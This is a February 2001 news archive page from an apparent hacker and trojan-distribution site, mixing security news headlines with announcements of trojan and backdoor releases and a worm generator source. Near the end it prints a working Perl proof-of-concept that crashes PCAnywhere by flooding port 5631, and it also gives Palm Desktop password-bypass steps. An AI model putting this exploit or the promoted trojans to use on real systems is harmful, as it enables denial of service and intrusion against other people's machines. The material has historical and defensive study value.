Bookmark or link to: www.kobayashi.cjb.net. All other url`s could change!
News Archive    Translate Traducen
News February 20001
28 February 2001

Noob 4.0 by |SHAD0W|.

www.infoworld.com:
Active Directory fix to require significant upgrade. Read more

www.infoworld.com:
First peer-to-peer virus hits. Read more

www.zdnet.com:
Size matters: Gnutella worm leaves a trail. Read more

www.newsbytes.com:
A Shot In The Arm For Net Virus Fighters. Read more

www.zdnet.co.uk:
Companies rally after Anna. Read more

www.net-security.org:
The "LoveLetter" Never Dies.
Kaspersky Lab sends out a warning about the new modification of the LoveLetter worm. Read more

www.vnunet.com:
Napster-type services threatened by virus. Read more

www.wired.com:
Space-Seeking Hacker Takes Files. Read more

www.ananova.com:
Chinese hackers 'waging cyber war on Japan'. Read more

www.zdnet.co.uk:
Marketing companies take tips from hackers. Read more

www.nj.com:
C. Shannon, a genius of digital life. Read more

www.linuxtoday.com.au:
Is Hacker Culture a Help or Hindrance? Read more

www.cnn.com:
Police investigating breach of computer security. Read more

www.wired.com:
Space-Seeking Hacker Takes Files. Read more

www.zdnet.com:
G8 ministers agonize over Net crime. Read more

www.trainingzone.co.uk:
Terrorism Act unlikely to deter hackers. Read more

www.theregister.co.uk:
Chinese develop software to 'purify' Net. Read more

27 February 2001

Fraggle Rock 1.2 by Gobo.

Microsoft Security Bulletin (MS01-013)
Windows 2000 Event Viewer Contains Unchecked Buffer. Read more

My GetRight is a free, easy to use member of the GetRight download manager software family for MS Windows. It uses the same method of "click monitoring" to take over the downloads from your web browser as the other versions of GetRight, but offers much more control and customization for web sites providing files for downloading. A security vulnerability in the product allows remote attackers (web site owners) to stealthily upload files to anywhere on a user's system (and even overwrite existing ones).
Vulnerable systems: My GetRight version prior to 1.0b
Vendor was notified and has verified the problem. A new version (v 1.0b) has been released which fixes both the directory traversal and transparent skin problem.

news.cnet.com:
Gnutella worm finds new way to squirm into PCs. Read more

www.theregister.co.uk:
Napster alternative: hack people's hard drives. Read more

ShareSniffer. Read more. (Link by CO)

www.adage.com:
Web bugs become subject of scrutiny. Read more

www.vnunet.com:
Hacker arrested after WEF attack. Read more

www.infoworld.com:
World Economic Forum hacker suspect in custody. Read more

www.computerworld.com:
'I Hired a Hacker': A Security Manager's Confession. Read more

www.vnunet.com:
Nintendo and 299 Germans hit by hackers. Read more

www0.mercurycenter.com:
Teen-age Norwegian computer geek: A villain to Hollywood, a hero to hackers. Read more

www.guardian.co.uk:
Kournikova came to stay - and bugged us all day long. Read more

www.wirednews.com:
Beware Those Insidious Vcards. Read more

www.vnunet.com:
OpenPGP set to become global standard. Read more

www.theregister.co.uk:
Online security gaffe exposes consumers' bank details. Read more

www.sfgate.com:
CYBER SLEUTHS
Computer forensics booms as importance of electronic evidence grows. Read more

www.newsroom.co.nz:
Tough Measures For Hackers, Surfers. Read more

www.zdnet.com:
Virus blame passes to users. Read more

www.chicagotribune.com:
HACKER GETS STUDENT DATA. Read more

www.business2.com:
New Wave of Threats Against Your Data. Read more

www.zdnet.com:
Foreign Flimflam. Read more

www.yomiuri.co.jp:
Site urges attacks on govt home pages. Read more

eb.lexis-nexis.com:
Japanese government on alert for Chinese computer hackers. Read more

www.nzherald.co.nz:
Copycats, your number's up. Read more

www.nydailynews.com:
Big Brother Is Here. High-tech intrusions of privacy have civil libertarians worried. Read more

26 February 2001

Latinus 1.2

Psychward 1.0

Examining Advanced Remote OS Detection Methods/Concepts using Perl. Read more

Firestarter is a complete firewall tool for Linux. (Link by CO)

ftp.avx.com:
AVX for ICQ is a FREE utility which uses new technology to intercept; filter, and virus scan all files sent during an ICQ chat session. Download

napalm.firest0rm.org:
Napalm is an e-zine devoted to computer security, with a healthy dose of music, news, and ethic. Read more

www.microsoft.com:
Outlook and Outlook Express VCard Handler Buffer Overflow Vulnerability. Read more

securityportal.com:
Weekly Microsoft Security Digest 2001/02/19 to 2001/02/25. Read more

securityportal.com:
Weekly BSD Security Digest 2001/02/19 to 2001/02/25. Read more

securityportal.com:
Weekly Solaris Security Digest 2001/02/19 to 2001/02/25. Read more

www.indian-express.com:
Your PC been hacked? Soon your insurance may pay for it. Read more

www.stuff.co.nz:
Hacker damage costs billions to businesses. Read more

www.techweb.com:
Users Still Vulnerable To AIM Break-Ins. Read more

www.zdnet.com:
Online battleground--has your home page been hijacked? Read more

www.nj.com:
Teen-age Norwegian computer geek: A villain to Hollywood, a hero to hackers. Read more

25 February 2001

We have a new great Flash Intro. Made by SilenceGold for MegaSecurity.

Shah 1.0 by Shaban.
Was before in the Archive under the wrong name M2trojan 1.25.

M2trojan 1.25 is not in the Archive.
M2 Trojan 1.47 by Myztic.

The purpose of Connecter is to let you connect to a computer and gather information about your connection to it. You can also make then program listen on a certain port and send back data manually or immediately on connection.

Chat with other visitors of MegaSecurity here.

www.research.ibm.com:
The Generic Virus Writer. Read more

www.taipeitimes.com:
Man pleads `self defense' after hacking. Read more

www.viruslist.com:
Letting the Fox in the Henhouse. Read more

abcnews.go.com:
Swiss Police Arrest Alleged World Economic Forum Hacker. Read more

linuxtoday.com:
Canada Computes: A Little Security in an Insecure World. Read more

www.linuxsecurity.com:
Time to un-BIND your network! Read more

www.linuxsecurity.com:
Browser hijackings upset security pundits. Read more

www.linuxsecurity.com:
Full Text of Underground Available for Download. Read more

Lookout for Outlook bug. Read more

www.theregister.co.uk:
McHackers use DNS exploit to poke fun. Read more

www.itsecurity.com:
Security Experts Say Denial-Of-Service Attacks Preventable With Low-Cost Technology; DDoS and Other Flood Attacks Avertable with Proper Network Configuration, Infrastructure. Read more

www.itsecurity.com:
New cybercrime law is too vague to protect UK businesses from malicious hackers. Read more

www.individual.com:
Top Layer Networks Strengthens AppSwitch Security Capabilities With Redundant Firewall Load Balancing. Read more

24 February 2001

BioNet 3.12 ME by ®ëZmØnd.

Senna Spy Internet Worm Generator Source (C++). Download

MicroSpy 1.0 tested by Nexzus. Read more

www.securiteam.com:
Infobot allows remote users to execute arbitrary commands. Read more

www.securiteam.com:
Internet Explorer Vulnerability enables Webmail Spoofing Attacks. Read more

www.zdnet.co.uk:
McDonalds UK Web site hacked by fluffy bunny. Read more

www.zdnet.com:
Top Ten reasons for old e-mails to disappear. Read more

news.cnet.com:
Happy birthday? Security flaw found in Outlook's VCards. Read more

abcnews.go.com:
Swiss Police Arrest Alleged World Economic Forum Hacker. Read more

news.cnet.com:
Police nab man in World Forum hacking case. Read more

www.pcadvisor.co.uk:
Telephones targeted by Euro hackers. Read more

www.wired.com:
Oh, Those Clumsy Anna Copycats. Read more

www.theregister.co.uk:
Taiwanese engineer pleads self defence in hacking case. Read more

seattletimes.nwsource.com:
Microsoft exec tells how hacker got in. Read more

Lock them hackers up! Read more

www.wired.com:
Old Spy, New Tricks. Read more

www.nandotimes.com:
Want to surf the Web anonymously? The CIA will help. Read more

www.pcadvisor.co.uk:
Hackers could be terrorists. Read more

web.lexis-nexis.com:
Customer data exposed through OfficeMax site. Read more

23 February 2001

MicroSpy 1.0

InCommand RegEditor.

FraggleRock tested by Nexzus: Read more

CryptIM is a messaging application for Windows. It provides easy encryption for your conversations All you have to do is type and hit SEND. CryptIM uses 3 different algorithms (one of which is Rijndael - The Advanced Encryption Standard) to provide well for the privacy of your communication. Multiuser chats have just been added. The program still has a few rough edges but, many more features will be implemented in the future. CryptIM is freeware for private noncommercial use.

Microsoft Security Bulletin (MS01-012)
Outlook, Outlook Express VCard Handler Contains Unchecked Buffer. Read more

securityportal.com:
Kournikova's Godfather Speaks Out. Read more

www.infoworld.com:
Fake Microsoft Web site makes the rounds. Read more

www.usatoday.com:
Suspect hacked into FBI system. Read more

www.theregister.co.uk:
FBI traitor suspect had mad C skillz. Read more

www1.telecomclick.com:
Bring On The Hackers. Read more

linuxtoday.com:
Sun Microsystems Security Bulletin Java Runtime Environment unauthorized command execution. Read more

www.zdnet.co.uk:
Terrorist Act will not deter hackers. Read more

www.thedigest.com:
Chinese Hackers Pissed Off. Read more

www.jpost.com:
Wanted: A cyber civil guard. Read more

www.builder.com:
Why You Should Fear Baby Hackers. Read more

www.nationalpost.com:
Dark underside of corporate rivalries exposed. Read more

www.zdnet.com:
DOJ rips hackers, '2600' mag in DVD-cracking flap. Read more

web.lexis-nexis.com:
CYBERCRIME CLASH AS TOO MANY BODIES TACKLE THE PROBLEM. Read more

web.lexis-nexis.com:
Suspect hacked into FBI system. Read more

22 February 2001

Fraggle Rock by Gobo.

MoonPie 1.3 by Simon Moon.

Thanks to ISO, CO and Da_Doc for their contribution.

twwwscan is a fast windows based command line WWW Vulnerability scanner. Link by CO.

The Prayer 1.0.zip is removed. It was infected by CIH. If somebody has a clean copy, please send me.

www.theregister.co.uk:
Virus toolkits are s'kiddie menace. Read more

www.securityfocus.com:
Studying Normal Traffic, Part 2: Studying FTP Traffic. Read more

www.osopinion.com:
Why is the Anna Worm Illegal? Read more

www.viruslist.com:
Letting the Fox in the Henhouse. Read more

www.antionline.com:
Hackers run up million-dollar phone bills in Europe. Read more

www.trainingzone.co.uk:
New terrorism act classes hackers as terrorists. Read more

home.kyodo.co.jp:
NTT West's Web site under attack by hackers. Read more

www.usatoday.com:
Suspect hacked into FBI system. Read more

www.wired.com:
Earthlink Slow to Admit Attack. Read more

news.cnet.com:
Columbia House breach exposes customer info. Read more

www.telegraph.co.uk:
Computer criminals weave Web of deceit. Read more

www.iol.co.za:
Hackers' crack at phone system costs millions. Read more

www.zdnet.com.au:
Security lapses: Breaking the bad news. Read more

web.lexis-nexis.com:
Security Experts Say Denial-Of-Service Attacks Preventable With Low-Cost Technology. Read more

web.lexis-nexis.com:
A STUDY BY ARTICON-INTEGRALIS AND MOSBACH COLLEGE OF VOCATIONAL STUDIES PROVES THAT SUCCESSFUL HACKING DOES NOT REQUIRE IN-DEPTH SPECIALIST KNOWLEDGE. Read more

web.lexis-nexis.com:
Experts to give tips on hacker prevention. Read more

21 February 2001

M2 Trojan 1.25

Windows Mite 1.0

Thanks to Da Doc for his contribution to the News.

Trojan Defence Suite: New Autostart Method. Read more

Microsoft Security Bulletin (MS01-011)
Malformed Request to Domain Controller can Cause Denial of Service. Read more

Virus Buster 2001 is a Japanese software package that has similar functions of PC-cillin 2000 such as email Virus Scanning and Browser Scanning. A buffer overflow vulnerability is present in the email-scanning module provided with the product. Vulnerable systems:
Virus Buster 2001 (Japanese) version 8.00
Immune systems:
Virus Buster 2001 (Japanese) version 8.01
A security hole is present in Virus Buster's email scanning module. The vulnerability manifests itself as a buffer overflow. The overflow happens when the MUA (Mail User Agent) receives an email with an unusually long string.

Urdls.c is an unreadable directory lister that produces the list of files in a directory on the local machine without having permission to do so. Urdls does so by guessing all possible alphanumeric filenames and using stat() to check for existence.

service1.symantec.com:
BAT.Install.Trojan. Read more

service1.symantec.com:
Backdoor.Acropolis. Read more

service1.symantec.com:
VBS.Trojan.Noob. Read more

www.viruslist.com:
"Carnivore" Put on a Diet in Name Only. Read more

www.viruslist.com:
ISP Busted for Allowing Kiddie Porn. Read more

www.viruslist.com:
Suit Purports IBM Involvement in Holocaust. Read more

www.viruslist.com:
What Have We Here? A "Kournikova" Clone? Read more

www.theregister.co.uk:
Microsoft protects Mac but not Windows users with web bug mail firewall. Read more

www.law.com:
In-House Cyber Security. Read more

202.84.17.11:
HK Sets Up First Computer Emergency Center. Read more

www.time.com:
Bad Boy of the Board. Read more

www.dawn.com:
Former hacker gets no respect as businessman. Read more

www.zdnet.com:
Crackdown: Are hackers terrorists? Read more

www.wired.com:
Secret Messages Come in .Wavs. Read more

www.theregister.co.uk:
PGP creator Zimmerman leaves Network Associates. Read more

www.localbusiness.com:
Who's bugging you on the Web? Read more

www.zdnet.com:
Bill would require 'opt-in' provision for spyware. Read more

www.zdnet.com:
Admins: Users share the blame. Read more

www.financialexpress.com:
Hackers attack HP, Compaq and others. Read more

www.securitywatch.com:
Bull security less than bully. Read more

www.securitywatch.com:
Lawless Internet overwhelms crime squad. Read more

www.securitywatch.com:
Disgruntled cracker defaces 30 Chinese websites. Read more

www.theregister.co.uk:
FBI agent sold surveillance/nuke data to Russia. Read more

web.lexis-nexis.com:
Pilot Scores High Marks as a Result of Successful Defense During Worldwide Hackers Contest. Read more

web.lexis-nexis.com:
IP MOVE COULD BE NIGHTMARE FOR BANKS, BUT IS A HACKER'S DREAM COME TRUE. Read more

web.lexis-nexis.com:
Virus Writing Is Now Infectious. Read more

web.lexis-nexis.com:
Cyber-stalker" jailed in Hong Kong for obscene messages and rape joke. Read more

20 February 2001

Fast Horse

CrackDown 1.0

Encapsulation EXE in a VB Script (creation tool). Read more

Link by SennaSpy:
Opus DirectAccess Version 3.5.3 Open Source This is the full package which supports Delphi 2 - 5, C++Builder 1 - 5 and Jet 3.x - 4.0, including the full source code. Opus DirectAccess is a plug-in database driver for Microsoft Access databases for Delphi and C++Builder. Borland provides native drivers with the BDE to access such databases. Read more

www.securiteam.com:
Easily Bypassing Palm Desktop Password Authentication.
The Palm desktop software supports a password protection scheme. Without entering the correct password, you should not be able to view the data. However, there is a simple way to bypass and get rid of the desktop password. This method is explained below.
DETAILS Vulnerable systems:
Palm Desktop version 4.0 (earlier versions are not vulnerable)
Exploit:
Run the Palm desktop software, and once it asks you for the password press Alt-F or Alt-H to get to the menu bar.
Once you have the menu pulled down navigate to Tools | Options and select the Security tab. Once there you uncheck the [] require password.
Click OK and then cancel out and exit. The next time you restart the Palm desktop software the password will be gone and anyone can view your data.

safeweb.com:
Safe Surfing: Read more

www.viruslist.com:
I-Worm.LoveLetter. Read more

www.viruslist.com:
Be My Valentine? Read more

www.viruslist.com:
Easy to Implement Technique Could Render HTML-Formatted Messages Accessible by All. Read more

www.ispep.cx:
Censorware: BESS filter. Read more

www.antionline.com:
Kournikova Virus Writer Speaks. Read more

www.zdnet.com:
'Cyberwars' bring real-world conflict to the Web. Read more

www.techtv.com:
Why is the Pentagon Snooping on School Kids? Read more

www.nzherald.co.nz:
Definition of 'document' crucial in hacker cases. Read more

www.techtv.com:
Lawmakers Make Spy Tech Top Priority. Read more

www.zdnet.com.au:
Hackers become terrorists under UK law. Read more

www.nzherald.co.nz:
Definition of 'document' crucial in hacker cases. Read more

www.theregister.co.uk:
Police have anti-nuclear protestor's numbers. Read more

news.ft.com:
Hackers face terrorism law. Read more

www.zdnet.co.uk:
Busy hackers add NY Times to their victim list. Read more

www.infoworld.com:
NSA warns it can't keep up with rapid changes in IT. Read more

web.lexis-nexis.com:
NET PREDATORS TARGET OF LAW. Read more

web.lexis-nexis.com:
FBI intervention traps Hong Kong cyber stalker. Read more

web.lexis-nexis.com:
Dutch author of "Anna Kournikova" computer virus apologizes

19 February 2001

Mneah 1.0 by Aphix.

GSfx Wizard, a tool that lets you build complete custom SelF-eXtracting Archives (SFX) with a Windows 2000 wizard interface for easy delivering of your documents, projects, programs, setup systems and other files... Read more

dkbf is a Distributed, Keyboard, Brute-Force program for Linux clusters that attacks Windows NT Lanman and NT hashes using the Message Passing Interface (MPI) to distribute the program L0phtCrack by the L0pht.

Ridentd is a stand-alone replacement for identd that uses a random selection of an ispell dictionary for generating fake ident responses. This server application is meant for the totally paranoid that need access to servers that require ident but don't want to give any information about local users to the remote server or its other users.

Ramenfind is a local Ramen worm detection and removal tool. The tool also allows administrators to archive the Ramen work found on their system for future analysis.

www.bitpipe.com:
Security on IP Networks - Countering Denial-of-Service (DoS) Attacks. Read more

www.bitpipe.com:
Covert Channels Provided Hackers the Opportunity and the Means for the Current Distributed Denial of Service Attacks. Read more

News:
securityportal.com:
Weekly Microsoft Security Digest 2001/02/12 to 2001/02/18. Read more

securityportal.com:
Weekly Solaris Security Digest 2001/02/12 to 2001/02/18. Read more

www.msnbc.com:
Network Solutions sells its database. Read more

www.hindustantimes.com:
What are Islamic fundamentalists doing in porn sites? The CIA tells you...Read more

www.lasvegassun.com:
Kournikova Hacker Offered Interview. Read more

www.ananova.com:
Mayor offers job to alleged maker of Kournikova virus. Read more

www.theregister.co.uk:
Microsoft struts into Net security market. Read more

linuxtoday.com:
Avoiding security holes when developing an application - Part 1. Read more

www.timesofindia.com:
Swiss police 'mum' on summit hacker attack: report. Read more

www.nandotimes.com:
Swiss police reportedly kept quiet on chances of World Economic Forum hack. Read more

www.timesofindia.com:
Swiss police 'mum' on summit hacker attack: report. Read more

www.financialexpress.com:
IT Act -- How do you prove damage to information? Read more

www.sunspot.net:
Big Brother could read your e-mail. Read more

www.cnn.com:
U.S. representatives mount attack on spam. Read more

www.ananova.com:
Up to 10,000 surfers stung in Brazilian web scam. Read more

www.infoworld.com:
Multiple Web sites defaced in hacking spree. Read more

news.cnet.com:
"Sm0ked" vandals say more attacks to come. Read more

Iomega defaced by the Sm0ked Crew Result

www.zdnet.co.uk:
Brazilian Web fraud grabs 10,000 credit card details. Read more

www.timesofindia.com:
`Better encryption technology can fight cyber crime'. Read more

www.newsday.com:
Authorities investigating alleged tampering with school computers. Read more

web.lexis-nexis.com:
FBI intervention traps Hong Kong cyber stalker. Read more

web.lexis-nexis.com:
An e-mail virus can be catching. Read more

web.lexis-nexis.com:
HACKER IS CAUGHT BY 1471 CALL. Read more

Wanted:
MicroSpy 1.0

18 February 2001

The right click protection of this page is removed.

Subsari 1.2 by KiPSOFT.

Dark FTP 1.2 by WaVeR.

Links by SennaSpy:
Fhred Binary Editor and other utilities (C/C++ Source Code): Read more
Berkeley LOGO: Read more

www.research.ibm.com:
An Undetectable Computer Virus. Read more

www.dark-e.com:
Extended anyalysis of AttackBot. Read more

www.dark-e.com:
New ICQ Spoofing. Read more

News:
www.zdnet.com:
Admitted Anna author hides in the Netherlands. Read more

www.reuters.com:
Kournikova Virus Suspect May Have Job, Says Mayor. Read more

news.cnet.com:
Anna virus fades late in game. Read more

www.computeruser.com:
Satanik.Child virus unleashed, Kournikova tracked. Read more

computerworld.com:
Microsoft enters security business with firewall software. Read more

linuxtoday.com:
BBspot.com: Microsoft builds most secure server [Humor]. Read more

www.theregister.co.uk:
New York Times Web site sm0ked. Read more

www.theregister.co.uk:
Dotcom hacks do it 'Their Way'. Read more

www.theregister.co.uk:
SP fears RIP breach in quashing Anna bug. Read more

securityportal.com:
Recovering from an MTX Infection. Read more

www.newsbytes.com:
Potential Security Weakness Found In Hotmail. Read more

www.techweb.com:
Hotmail Security Hole: False Alarm? Read more

www.zdnet.co.uk:
Symantec denies action over virus patents. Read more

www.techweb.com:
Congress Attacks Wireless Junk Mail. Read more

www.wired.com:
Napster's New (Secure) Groove. Read more

www.idg.net:
Fraud Busters. Read more

www.oreillynet.com:
Monitoring Unix Logins. Read more

www.techweb.com:
Attacking DoS Attacks. Read more

Wanted:
MicroSpy 1.0

17 February 2001

Mantis 1.1 by Shaban.

How to Stop Love_Letter, Life Stages and Other Viruses. Read More

Links by SennaSpy:
OpenBSD 2.8 (C Source Code): Download
RInstall 3.53 Install Maker (C Source Code): Download

www.vnunet.com:
Anna virus toolkit removed. Read more

www.timesofindia.com:
Dutch police nab one for Kournikova computer virus. Read more

www.internetweek.com:
Anna Virus Catches IT Shops Off Guard. Read more

www.newsbytes.com:
New Anna Kournikova Virus On The Loose In Germany. Read more

www.zdnet.com:
Never lose data to a virus! Use my simple 5-point protection plan. Read more

service1.symantec.com:
VBS.Vbswg.K. Read more

www.pollutiononline.com:
Protecting your computer data from hackers, viruses and blackouts. Read more

www.zdnet.com:
Smoked! Busy hackers add NY Times to their victim list. Read more

www.zdnetasia.com:
Teenagers questioned in online bank fraud. Read more

www.pbs.org:
hacked by a corporation? Read more

www.theregister.co.uk:
Intel hacker talks to The Reg. Read more

www.businessweek.com:
Your Web Site Might Be Playing Host to a Hacker. Read more

www.networkweek.com:
Hotmail Security Hole: False Alarm? Read more

www.antionline.com:
Xcoded E-Mail Wiretaps Could Become Even More Common Than Viruses. Read more

www.ananova.com:
Hacker caught after 1471 blunder. Read more

www.brw.com.au:
Web: Hackers jolt corporate complacency. Read more

www.pilot.net:
Monthly Report Details Frequency, Type, and Apparent Origin of Internet Attacks on E-Businesses Worldwide. Read more

www.europemedia.net:
Spain: Attacks from hackers rise 210%. Read more

www.timesofindia.com:
CIA invests $1 mn in Web company. Read more

thestar.com.my:
Lawmakers focus on NSA technology, CIA spies. Read more

www.inside.com:
CNN.com 'Scoop' on James Bond Film Was a Hacker Hoax. Read more

www.zdnet.com:
Strangers with candy. Read more

web.lexis-nexis.com:
Viruses on the Loose. Read more

web.lexis-nexis.com:
LONG ARM OF LAW TO REACH BEYOND NATIONAL BORDERS INTO CYBERSPACE. Read more

16 February 2001

BioNet 3.11 ME by ®ëZmØnd.

Insect 1.0 beta by ShABAN.

According to Aladdin Knowledge Systems:
SennaSpy, Crew member of MegaSecurity, is the creator of the tool used to produce the Kournikova worm.

These tools to construct malware are distributed over the net. It is amazing that the worm spread so quickly. The cause that this variation had such an impact on the net, can only be explained by the promise to see the picture of Kournikova.
Of course a lot of people must have been curious about a picture of her. A Yasser Arafat worm spread would not spread itself so fast. :) An interesting question is, has it infected more male computers owners than female ones? Read More

www.zdnet.com:
Purported 'Anna' virus toolkit author yanks files from site. Read more

www.wired.com:
You, Too, Can Write an Anna Worm. Read more

geeknews.net:
Write your own Anna-like worm. Read more

seattletimes.nwsource.com:
Dutch free computer-virus suspect. Read more

www.zdnet.com.au:
'Anna' virus suspect faces four years. Read more

cgi.usatoday.com:
Virus starter may be in Dutch with the FBI. Read more

news.cnet.com:
Purported 'Anna' virus toolkit author yanks files from site. Read more

www.antionline.com:
Kournikova Virus Writer Speaks. Read more

www.pcworld.com:
Despite Virus Attacks, Many PCs Remain Unprotected. Read more

www.computerworld.com:
Virus proves users, systems still vulnerable, security experts say. Read more

securityportal.com:
Weekly Virus Digest 2001/02/09 to 2001/02/15. Read more

www.newsbytes.com:
Satanik.Child Virus Unleashed, Kournikova Tracked. Read more

VBS.Satanik.Child Vandal. Read more

www.cotse.com:
Earthlink cracked! Read more

www.europemedia.net:
Spain: Attacks from hackers rise 210%. Read more

www2.marketwatch.com:
Hackers attack U.S. tech giants. Read more

news.cnet.com:
Hackers attack HP, Compaq, others. Read more

www.timesofindia.com:
CIA invests $1 mn in Web company. Read more

www.hindustantimes.com:
Secret surfing no freebie. Read more

dailynews.yahoo.com:
Lawmakers Focus on NSA Technology, CIA Spies. Read more

www.brw.com.au:
Hackers jolt corporate complacency. Read more

www.zdnet.co.uk:
Schoolboy cracker caught by dialling 1471. Read more

www.theregister.co.uk:
Pedos volunteered system passwords to cops. Read more

www.nandotimes.com:
Web filters far from perfect, Consumer Reports says. Read more

hongkong1.cnet.com:
Microsoft uncloaks new security software. Read more

web.lexis-nexis.com:
HACKERS COST EUROPE #3BN. Read more

web.lexis-nexis.com:
COMPUTER VIRUS FAILS TO SCORE IN ASIA. Read more

15 February 2001

CrackDown 1.0 beta by 14 year old GateKeeper2K.

BioNet 3.11 is out. Read more

The Network Security Monitor Daemon is a lightweight network security monitor for TCP/IP LANs which will capture certain network events and record them in a relational database. The recorded data is then made available for analysis via a CGI-based interface.

Links by SennaSpy:
lcc-win32 C compiler, version updated - 01/04/2000: Download
VBD Socket Library
The VB Socket Communications Library is a collection of C++ classes used to build portable TCP/IP and RS232 data communication applications as part of the VBD or independently. Read more
Download the RSA source code, this is a very simple client/server application, writing in C/C++...
Allow you connect in another machine and execute applications. Good for make a little trojan :-) Download

www.securiteam.com:
Using Wingate proxies as redirectors
There is a way to abuse Wingate services authentication/wrapper/binding schemes simply by using the HTTP proxy. Any user allowed to connect the proxy should be able to use any of UP Wingate's services. Read more

Microsoft Security Bulletin MS01-010
Patch Available for "Windows Media Player Skins File Download" Vulnerability. Read more

www.theregister.co.uk:
BTinternet users banned by IRC network.
BTinternet users have been banned from using a popular IRC network whilst the hunt for a vandal spreading a Trojan continues. Read more

Anna Kournikova Worm. Tragedy or Comedy?
How worse is the Internet Security in spite of all the Billions of dollars spent on it.
Just catching and punishing the writers will not help very much.
Its clear that the there is something very bad with the Internet Security if anybody with minimal knowledge can do this.
This one does not damage the computers. How bad could it be if someone with more knowledge and bad intentions will do this? More evil ones will sure follow. The Security should be grateful for this warning. (M_R)

www.securitywatch.com:
Anna created with virus toolkit. Read more

www.law.com:
Dutch Detain Then Release Suspect in Tennis Star Computer Virus. Read more

news.cnet.com:
FBI probes virus outbreak after "Anna" arrest. Read more

www.viruslist.com:
The Flying Dutchman. Read more

www.wired.com:
Why Worm Writer Surrendered. Read more

www.timesofindia.com:
Dutch police arrest suspect in computer virus. Read more

www.informationweek.com:
Dutch Man Claims To Be Creator Of Anna Kournikova Virus. Read more

www.vnunet.com:
Anna virus writer arrested. Read more

www.securitywatch.com:
Kournikova virus creator digs his own grave, confesses. Read more

web.lexis-nexis.com:
Computer Virus: Protecting Against E-Mail Disguised as Kournikova Photo. Read more

onenews.nzoom.com:
NZ seeks to shut out hackers. Read more

www.newsbytes.com:
25 Percent Of Users Lose Data To Hackers, Viruses. Read more

www.ottawacitizen.com:
Napster-like Internet tools worry CSIS. Read more

www.newsfactor.com:
It's Official: FBI's Carnivore No More. Read more

www.securitywatch.com:
Indian hackers on bail. Read more

web.lexis-nexis.com:
Tinkering With Hackers. Read more

14 February 2001

Exploiter 1.4 by ap0calaps.
-Phone Notification - Will dial up a selected number and tell them the server is online
-World Wide SMS Notification - supports all nokia phones

BSD FingerPrintFucker is a kld for FreeBSD that changes the TCP/IP stack in order to emulate other OS's against TCP/IP fingerprinting.

nPulse v0.42, a web-based network monitor using NMAP, released

Snarp is a tool for NT 4.0 that uses an ARP poisoning attack to cause a host to redirect traffic to the attacking machine (the machine running Snarp), and thus allowing that host to sniff the data from the wire.

Microsoft Security Bulletin MS01-009
Software: Windows NT 4.0 servers running PPTP
Impact: Denial of service
Patch Available for "Malformed PPTP Packet Stream" Vulnerability. Read more

Buffer overflow found in the America Online program.
America Online 5.0 is the software used by millions of users to connect to the online service America Online provides.
Within the software is a field in which the user inputs the URL of the website he/she wishes to visit.
A buffer overflow condition has been discovered, triggered by entering a long URL in that input box.
The characteristics of this overflow are very unusual, nevertheless when an overflow does occur it can be exploited to cause the program to execute arbitrary code.

tnt2.ath.cx:
Intervieuws with Trojan Coders. Read more

www.newsfactor.com:
Anna Virus Author Confesses. Read more

www.mcafee.com:
AnnaKournikova.jpg.vbs. Read more

www.viruslist.com:
Game, Set and Match: A New VBS Worm Modification Hits the Circuit. Read more

www.vmyths.com:
Kournikova cornucopia. Read more

news.cnet.com:
Anna virus author comes forward.
A Dutch virus writer known as OnTheFly admitted Tuesday to writing the Anna Kournikova virus. Read more

www.newsbytes.com:
Kournikova Worm Writer Serves Up Confession.
OnTheFly said that while he created the virus using a Visual Basic Worm Generator written by K. Alamar, the original author had no involvement in the Anna Kournikova virus. Read more

www.infoworld.com:
Anna virus the work of 'script kiddies'. Read more

www.nandotimes.com:
Experts hone in on 'Anna' virus suspect. Read more

www.thestandard.com:
Alleged Author of 'Tennis' Virus Says He Meant No Harm. Read more

www.zdii.com:
Dutch treat? Netherlander takes credit for 'Anna' virus. Read more

www.pcworld.com:
How to Trick the Anna Worm. Read more

www.msnbc.com:
‘OnTheFly’ confesses to virus. Read more

www.infoworld.com:
Anna Kournikova worm hits the United States. Read more

www.zdnet.co.uk:
Wonderland used encryption to swap child abuse pictures. Read more

www.zdnet.com.au:
Secret agents invade your PC.
When software companies update your computer, are they also stealing information without your permission? Read more

www.theregister.co.uk:
Mitnick movie on DVD. Read more

www.computerweekly.com:
Virus hosts could face legal threat. Read more

www.southnexus.com:
Two alleged web site hackers granted bail. Read more

www.thetimes.co.uk:
How to beat the hackers. Read more

www.vny.com:
NSA listens to bin Laden. Read more

www.individual.com:
FBI's Upgrade Of Carnivore Includes New Name. Read more

web.lexis-nexis.com:
Hi-technology companies form coalition vs hackers. Read more

web.lexis-nexis.com:
'Frontline' Sounds Cyber Alarm. Read more

web.lexis-nexis.com:
Hackers boast of attack. Read more

13 February 2001

IrcContact 1.0. Thanks to Vladimir.

Links by SennaSpy:
- ICQ 99b password decryptor (with C source code available :-): Download
- Good website for C programmers: Read more
- Inno Setup 1.3.26 with Delphi source code available !
  Make installers for your programs !
  My favorite install maker !
  Official Website: www.jrsoftware.org/isdl.htm
  or Direct Download:www.jrsoftware.org/files/site1/issrc.zip

SAStk (Slackware Administrators Security tool kit) aims to provide a set of tools and utilities to install and maintain a reasonable level of security for the Slackware GNU/Linux distribution. At the same time, it should ease administration with a new centralized initialization setup and background information on what each daemon does.

CERT® Advisory CA-2001-03.
The "VBS/OnTheFly" malicious code is a VBScript program that spreads via email. This malicious code can infect a system if the enclosed email attachment is run. Read more

PCAnywhere.
A security vulnerability in the product allows remote attackers to cause the program crash, and possibly also execute arbitrary code (though the vulnerability isn't stable enough to successfully cause "sure" execution of code).
This is intended as proof of concept, do not abuse!

use IO::Socket;
$host = "$ARGV[0]";
$port = 5631;
if ($#ARGV<0) {
print "use it like: $0 <hostname>\n";
exit();
}
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host,
PeerPort=>$port) || die "damn, ";
print "hello\n";
$buf = "";
for($counter = 0; $counter < 500000; $counter++) {
  $buf .= "\x61";
}
print $socket "$buf\n";
close($socket);
exit();

A new VBS Virus is spreading by e-mail, using the simple technique of a VB Script disguised as a JPEG picture. This Virus, dubbed AnnaKournikova, spreads via e-mails with the following subject line:
Here you have, ;o)
And an attachment called AnnKournikove.jpg.vbs. When the user opens the file (mistakenly thinking it's a jpeg file), the script runs. This is not a new technique, but this Virus seems to be propagating quicker than similar Viruses.

www.nzherald.co.nz:
Kournikova at centre of latest computer virus. Read more

www.theage.com.au:
Kournikova virus strikes Australia. Read more

www.infoworld.com:
Anna Kournikova worm hits the United States. Read more

www.bloomberg.com:
Computer Virus Spreads, Posing as Kournikova Photo (Update2). Read more

thestandard.com:
